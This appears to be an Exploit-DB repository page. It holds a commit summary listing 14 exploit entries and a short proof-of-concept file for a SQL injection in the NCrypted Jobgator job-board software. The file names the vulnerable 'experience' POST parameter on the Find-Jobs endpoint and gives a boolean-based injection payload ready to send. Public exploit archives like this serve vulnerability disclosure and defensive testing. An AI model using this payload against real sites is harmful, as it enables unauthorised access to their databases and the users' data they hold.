23f668ca8d
14 changes to exploits/shellcodes FlexHEX 2.71 - SEH Buffer Overflow (Unicode) AllPlayer 7.4 - SEH Buffer Overflow (Unicode) River Past Cam Do 3.7.6 - 'Activation Code' Local Buffer Overflow Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation QNAP Netatalk < 3.1.12 - Authentication Bypass Jobgator - 'experience' SQL Injection Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities SaLICru -SLC-20-cube3(5) - HTML Injection CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting Tradebox CryptoCurrency - 'symbol' SQL Injection WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass ManageEngine ServiceDesk Plus 9.3 - User Enumeration
15 lines
No EOL
484 B
Text
15 lines
No EOL
484 B
Text
# Exploit Title: NCrypted Jobgator - SQL Injection
|
|
# Date: 05.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.ncrypted.net/jobgator/
|
|
# Demo Site: https://demo.ncryptedprojects.com/jobgator/
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC 1: SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/agents/Find-Jobs
|
|
Vulnerable Parameter: experience (POST)
|
|
Payload: btnsearch=Search&experience=1" OR NOT
|
|
4365=4365#&job_title=Mr.&location=1 |